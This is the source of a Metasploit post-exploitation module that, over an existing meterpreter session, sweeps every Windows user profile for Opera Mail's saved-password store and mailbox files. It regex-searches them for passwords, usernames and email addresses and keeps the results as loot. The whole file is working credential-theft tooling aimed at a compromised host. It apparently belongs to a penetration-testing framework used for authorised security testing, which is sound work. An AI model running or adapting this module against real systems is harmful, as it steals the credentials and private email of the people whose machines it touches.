Path: blob/master/modules/post/windows/gather/credentials/operamail.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation credential gatherer for Opera Mail on Windows.
#
# For every user profile on the session host, the Packrat mixin is asked to
# collect the Opera Mail artifacts declared in ARTIFACTS (the wand.dat
# password store and the *.mbs mailbox files) and to run the declared regex
# searches over them. How Packrat locates, downloads and stores the files is
# implemented in Msf::Post::Windows::Packrat, not here.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Regex searches applied to each Opera Mail artifact. Both artifact types
  # below use exactly the same two searches, so they are declared once and
  # shared rather than repeated per artifact.
  OPERA_MAIL_SEARCHES = [
    {
      extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
      extraction_type: 'credentials',
      regex: [
        '(?i-mx:password.*)',
        '(?i-mx:username.*)'
      ]
    },
    {
      extraction_description: 'searches for Email TO/FROM address',
      extraction_type: 'Email addresses',
      regex: [
        '(?i-mx:to:.*)',
        '(?i-mx:from:.*)'
      ]
    }
  ].freeze

  # Artifact description consumed by run_packrat. Each entry names a file
  # (or glob) under a per-user profile directory, a human-readable
  # description, and the searches to run over its contents.
  ARTIFACTS = {
    application: 'operamail',
    app_category: 'emails',
    gatherable_artifacts: [
      {
        # NOTE(review): 'chats_image' is the enum value the operator selects
        # for the wand.dat password store; it reads like a leftover from
        # another module, but it is part of the ARTIFACTS option's accepted
        # values, so it is kept unchanged here.
        filetypes: 'chats_image',
        path: 'AppData',
        dir: 'Opera Mail',
        artifact_file_name: 'wand.dat',
        description: "Opera-Mail's saved Username and Passwords",
        credential_type: 'text',
        regex_search: OPERA_MAIL_SEARCHES
      },
      {
        filetypes: 'email_logs',
        path: 'LocalAppData',
        dir: 'Opera Mail',
        artifact_file_name: '*.mbs',
        description: "Opera-Mail's Emails",
        credential_type: 'text',
        regex_search: OPERA_MAIL_SEARCHES
      }
    ]
  }.freeze

  # Registers module metadata and the operator-facing options.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Operamail Credential Gatherer',
        'Description' => %q{
          This module searches for Operamail credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS option offers 'All' plus each distinct filetypes label
    # declared above, in declaration order.
    artifact_choices = ['All', *ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq]

    register_options(
      [
        # '^' anchors at the start of a line, not of the whole file;
        # presumably Packrat applies this per line — TODO confirm.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Entry point: echoes the chosen filters, then sweeps every user profile
  # on the host with run_packrat using the ARTIFACTS declaration.
  def run
    selections = {
      'ARTIFACTS' => datastore['ARTIFACTS'].capitalize,
      'STORE_LOOT' => datastore['STORE_LOOT'],
      'EXTRACT_DATA' => "#{datastore['EXTRACT_DATA']}\n"
    }

    print_status('Filtering based on these selections: ')
    selections.each { |option, value| print_status("#{option}: #{value}") }

    # One Packrat pass per user profile found on the remote host.
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status('PackRat credential sweep completed')
  end
end